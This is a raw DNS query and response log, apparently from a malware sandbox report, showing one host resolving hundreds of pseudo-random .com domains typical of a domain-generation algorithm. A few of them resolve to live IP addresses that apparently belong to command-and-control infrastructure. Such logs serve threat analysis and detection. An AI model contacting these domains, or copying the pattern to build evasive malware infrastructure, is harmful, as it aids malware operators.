                                                                                                                                                                                                            Nov 11, 2024 18:08:52.540385962 CET192.168.2.91.1.1.10xf7cStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544475079 CET192.168.2.91.1.1.10xd091Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.546242952 CET192.168.2.91.1.1.10x2c65Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.547792912 CET192.168.2.91.1.1.10x83d3Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.552020073 CET192.168.2.91.1.1.10x45b8Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.552654982 CET192.168.2.91.1.1.10x6342Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553731918 CET192.168.2.91.1.1.10x5d82Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553750038 CET192.168.2.91.1.1.10x2fa4Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553946018 CET192.168.2.91.1.1.10x3c3aStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.555237055 CET192.168.2.91.1.1.10xeeeeStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.574048042 CET192.168.2.91.1.1.10x179eStandard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.574831963 CET192.168.2.91.1.1.10x82efStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.575181961 CET192.168.2.91.1.1.10xf361Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.575400114 CET192.168.2.91.1.1.10xe241Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.575860023 CET192.168.2.91.1.1.10x31e3Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576016903 CET192.168.2.91.1.1.10x45d4Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576318026 CET192.168.2.91.1.1.10x4327Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576524019 CET192.168.2.91.1.1.10xc593Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576726913 CET192.168.2.91.1.1.10x22cfStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423559904 CET1.1.1.1192.168.2.90xcd2cName error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423571110 CET1.1.1.1192.168.2.90x284bName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423628092 CET1.1.1.1192.168.2.90xea3cName error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423676014 CET1.1.1.1192.168.2.90x2866Name error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423744917 CET1.1.1.1192.168.2.90x4673Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423798084 CET1.1.1.1192.168.2.90x2f71Name error (3)vocyqaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423847914 CET1.1.1.1192.168.2.90x9f4aName error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.424097061 CET1.1.1.1192.168.2.90x52f2Name error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.424369097 CET1.1.1.1192.168.2.90x65d4Name error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.425237894 CET1.1.1.1192.168.2.90xa6eaName error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.425385952 CET1.1.1.1192.168.2.90xee3fName error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.425733089 CET1.1.1.1192.168.2.90x52feName error (3)qeqytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426126003 CET1.1.1.1192.168.2.90xc0adName error (3)qedyveg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426233053 CET1.1.1.1192.168.2.90xe1e9Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426321030 CET1.1.1.1192.168.2.90x2b3aName error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426331043 CET1.1.1.1192.168.2.90xa661Name error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426374912 CET1.1.1.1192.168.2.90xf403Name error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426549911 CET1.1.1.1192.168.2.90xaef4Name error (3)volyjok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426937103 CET1.1.1.1192.168.2.90xa0bbName error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427011967 CET1.1.1.1192.168.2.90xdbcName error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427262068 CET1.1.1.1192.168.2.90x4bebName error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427557945 CET1.1.1.1192.168.2.90xc01dName error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427567005 CET1.1.1.1192.168.2.90xc8b8Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427776098 CET1.1.1.1192.168.2.90xc659Name error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427892923 CET1.1.1.1192.168.2.90xd698Name error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.431126118 CET1.1.1.1192.168.2.90x1dbaName error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.431375027 CET1.1.1.1192.168.2.90xfa96Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.432061911 CET1.1.1.1192.168.2.90xd6c3Name error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.432415962 CET1.1.1.1192.168.2.90x89cbName error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.436433077 CET1.1.1.1192.168.2.90x6adfName error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.443660021 CET1.1.1.1192.168.2.90x5dd3Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.444919109 CET1.1.1.1192.168.2.90x1d4Name error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.445233107 CET1.1.1.1192.168.2.90x3f3dName error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.447393894 CET1.1.1.1192.168.2.90x2e83Name error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.447828054 CET1.1.1.1192.168.2.90xf839Name error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448220015 CET1.1.1.1192.168.2.90x32d2Name error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448268890 CET1.1.1.1192.168.2.90x5da7Name error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448738098 CET1.1.1.1192.168.2.90xe85aName error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448872089 CET1.1.1.1192.168.2.90xed35Name error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.449493885 CET1.1.1.1192.168.2.90x278fName error (3)gahyfyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.450148106 CET1.1.1.1192.168.2.90xb16Name error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.462630033 CET1.1.1.1192.168.2.90x5106No error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.462630033 CET1.1.1.1192.168.2.90x5106No error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.608338118 CET1.1.1.1192.168.2.90xda2cNo error (0)lygynud.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.617007017 CET1.1.1.1192.168.2.90x5f57No error (0)pupycag.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.705991030 CET1.1.1.1192.168.2.90xe367No error (0)lyrysor.comzz1985.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.705991030 CET1.1.1.1192.168.2.90xe367No error (0)zz1985.qu200.comgtm-sg-6l13ukk0m05.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.705991030 CET1.1.1.1192.168.2.90xe367No error (0)gtm-sg-6l13ukk0m05.qu200.com103.150.10.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.752036095 CET1.1.1.1192.168.2.90x5751Name error (3)lyrytun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.760979891 CET1.1.1.1192.168.2.90x6dd7Name error (3)qebykap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.761003017 CET1.1.1.1192.168.2.90xec3fName error (3)lyvyjox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.763149023 CET1.1.1.1192.168.2.90x9a17Name error (3)puvyjop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.765381098 CET1.1.1.1192.168.2.90xf89fName error (3)qedysov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.767148018 CET1.1.1.1192.168.2.90x4852Name error (3)lykynyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.767242908 CET1.1.1.1192.168.2.90xf6cdName error (3)vopypif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.768244028 CET1.1.1.1192.168.2.90xb1e2Name error (3)gacyhis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.770869017 CET1.1.1.1192.168.2.90xe45Name error (3)vocyjic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.770931959 CET1.1.1.1192.168.2.90x86e5Name error (3)qexynyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.773915052 CET1.1.1.1192.168.2.90x99acName error (3)ganykaz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.773958921 CET1.1.1.1192.168.2.90x5516Name error (3)vojybek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.774566889 CET1.1.1.1192.168.2.90x1b30Name error (3)qetytug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.774682045 CET1.1.1.1192.168.2.90x9ea6Name error (3)vonyket.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.775535107 CET1.1.1.1192.168.2.90x7894Name error (3)gatypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.776648045 CET1.1.1.1192.168.2.90x1500Name error (3)pupypiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.777059078 CET1.1.1.1192.168.2.90x7303Name error (3)purytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.782135963 CET1.1.1.1192.168.2.90x2148Name error (3)gaqykab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.786787987 CET1.1.1.1192.168.2.90x9960Name error (3)gahyvew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.787626982 CET1.1.1.1192.168.2.90x1c6bName error (3)pujybyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.791198015 CET1.1.1.1192.168.2.90xa26bName error (3)pumylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.795231104 CET1.1.1.1192.168.2.90x684eName error (3)qekynuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.798989058 CET1.1.1.1192.168.2.90xd25bName error (3)lysysod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.808929920 CET1.1.1.1192.168.2.90x7945Name error (3)gacynuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.811471939 CET1.1.1.1192.168.2.90x1575Name error (3)qetylyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.824351072 CET1.1.1.1192.168.2.90xa7dbName error (3)qedyxip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.825009108 CET1.1.1.1192.168.2.90xe9dfName error (3)qebyqil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.825763941 CET1.1.1.1192.168.2.90xf4deName error (3)gatyzys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.826710939 CET1.1.1.1192.168.2.90x9f86Name error (3)pufypiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.829946041 CET1.1.1.1192.168.2.90x2b18Name error (3)vopyzuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.830632925 CET1.1.1.1192.168.2.90xb5c1Name error (3)lyvymir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.832420111 CET1.1.1.1192.168.2.90xaabName error (3)gahydoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.835787058 CET1.1.1.1192.168.2.90x2e3bName error (3)puzyguv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.837743044 CET1.1.1.1192.168.2.90xebb0Name error (3)ganyqow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.840373993 CET1.1.1.1192.168.2.90xd8d9Name error (3)pujydag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.844316959 CET1.1.1.1192.168.2.90xb546Name error (3)puvymul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.637742043 CET1.1.1.1192.168.2.90x7179Name error (3)lyxyvoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.640661955 CET1.1.1.1192.168.2.90xe9c7Name error (3)lykyxur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.641465902 CET1.1.1.1192.168.2.90x34d6Name error (3)pupywog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.643162012 CET1.1.1.1192.168.2.90xb7b8Name error (3)pumygyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.643640995 CET1.1.1.1192.168.2.90xb323Name error (3)vowyjut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.675443888 CET1.1.1.1192.168.2.90x3656Name error (3)qegylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.677750111 CET1.1.1.1192.168.2.90x9acaName error (3)qekyxul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.678008080 CET1.1.1.1192.168.2.90x6672Name error (3)pujyxyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.678841114 CET1.1.1.1192.168.2.90x1c32Name error (3)volycik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.680474997 CET1.1.1.1192.168.2.90xf028Name error (3)gahyzez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.698308945 CET1.1.1.1192.168.2.90x1703Name error (3)lyrymuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.699145079 CET1.1.1.1192.168.2.90xa691Name error (3)vocydof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.700264931 CET1.1.1.1192.168.2.90xb58Name error (3)galycuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714400053 CET1.1.1.1192.168.2.90x7ad3Name error (3)qeqynel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714490891 CET1.1.1.1192.168.2.90xaa8eName error (3)lysyjid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714644909 CET1.1.1.1192.168.2.90x93e7Name error (3)volypum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714896917 CET1.1.1.1192.168.2.90xc868Name error (3)ganyvoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.718524933 CET1.1.1.1192.168.2.90xda5bName error (3)vowymyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.730048895 CET1.1.1.1192.168.2.90xbda1Name error (3)galypyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.734103918 CET1.1.1.1192.168.2.90x2858Name error (3)pumybal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745805979 CET1.1.1.1192.168.2.90x6d78Name error (3)vopyjuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747035027 CET1.1.1.1192.168.2.90x3aa6Name error (3)gatyqih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747549057 CET1.1.1.1192.168.2.90x3cf9Name error (3)vojyrak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747559071 CET1.1.1.1192.168.2.90x386fName error (3)qebyvop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747665882 CET1.1.1.1192.168.2.90x8105Name error (3)qexysig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.748086929 CET1.1.1.1192.168.2.90xec5bName error (3)lykytej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.748750925 CET1.1.1.1192.168.2.90x21e5Name error (3)qetyquq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.748830080 CET1.1.1.1192.168.2.90x237fName error (3)purymuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.749941111 CET1.1.1.1192.168.2.90x3492Name error (3)puzypug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.750673056 CET1.1.1.1192.168.2.90xc41fName error (3)vofykoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.751141071 CET1.1.1.1192.168.2.90x9ceaName error (3)puvydov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.751152039 CET1.1.1.1192.168.2.90x2a07Name error (3)vonybat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.751692057 CET1.1.1.1192.168.2.90x8392Name error (3)lymyner.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.754714966 CET1.1.1.1192.168.2.90x9ffName error (3)qedykiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.755249977 CET1.1.1.1192.168.2.90xb262Name error (3)vojyzyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.756154060 CET1.1.1.1192.168.2.90x7850Name error (3)lyvyfad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.756791115 CET1.1.1.1192.168.2.90xfd5eName error (3)lyxysun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.764777899 CET1.1.1.1192.168.2.90x96e8Name error (3)lygylax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.767831087 CET1.1.1.1192.168.2.90xd12Name error (3)qekytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.769329071 CET1.1.1.1192.168.2.90xaf3eName error (3)puvycip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.769448996 CET1.1.1.1192.168.2.90xec11No error (0)qetyhyg.com64.225.91.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.770052910 CET1.1.1.1192.168.2.90x414bName error (3)lyvyvix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.770064116 CET1.1.1.1192.168.2.90x16c6Name error (3)gadykos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.770072937 CET1.1.1.1192.168.2.90xe19dName error (3)pufylap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.772631884 CET1.1.1.1192.168.2.90xe7b2Name error (3)gaqynyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.776436090 CET1.1.1.1192.168.2.90x66b9Name error (3)gacydib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.777905941 CET1.1.1.1192.168.2.90x440cName error (3)pujyteq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.101494074 CET1.1.1.1192.168.2.90x5828No error (0)gatyhub.compltraffic7.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.101494074 CET1.1.1.1192.168.2.90x5828No error (0)pltraffic7.com72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.385814905 CET1.1.1.1192.168.2.90x7a99Name error (3)pupymyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.386557102 CET1.1.1.1192.168.2.90xed72Name error (3)qegyrol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.387299061 CET1.1.1.1192.168.2.90xbb2fName error (3)galyzeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.406172991 CET1.1.1.1192.168.2.90xa08eName error (3)gahyraw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.429795027 CET1.1.1.1192.168.2.90xbf01Name error (3)purygeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.429841995 CET1.1.1.1192.168.2.90x2f09Name error (3)vocycuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.435194969 CET1.1.1.1192.168.2.90xbd98Name error (3)lykywid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.436234951 CET1.1.1.1192.168.2.90xcf5dName error (3)vopygat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444459915 CET1.1.1.1192.168.2.90x3339Name error (3)qexyxuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444701910 CET1.1.1.1192.168.2.90x4840Name error (3)pumydoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.448477030 CET1.1.1.1192.168.2.90x319eName error (3)qebyxyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452811956 CET1.1.1.1192.168.2.90x4daaName error (3)vofyqit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452828884 CET1.1.1.1192.168.2.90xcc3fName error (3)vowygem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.456082106 CET1.1.1.1192.168.2.90x3232Name error (3)volyzef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.460681915 CET1.1.1.1192.168.2.90x4bfeName error (3)gacycus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.461407900 CET1.1.1.1192.168.2.90x7f74Name error (3)qekylag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.461671114 CET1.1.1.1192.168.2.90xcff3Name error (3)pufywil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.462121964 CET1.1.1.1192.168.2.90xaf53Name error (3)ganycuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.462150097 CET1.1.1.1192.168.2.90x42fbName error (3)gaqyfah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.462971926 CET1.1.1.1192.168.2.90xe437Name error (3)puzyxyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.467894077 CET1.1.1.1192.168.2.90x3a08Name error (3)lyrygyn.comnonenoneA (IP address)IN (0x0001)false
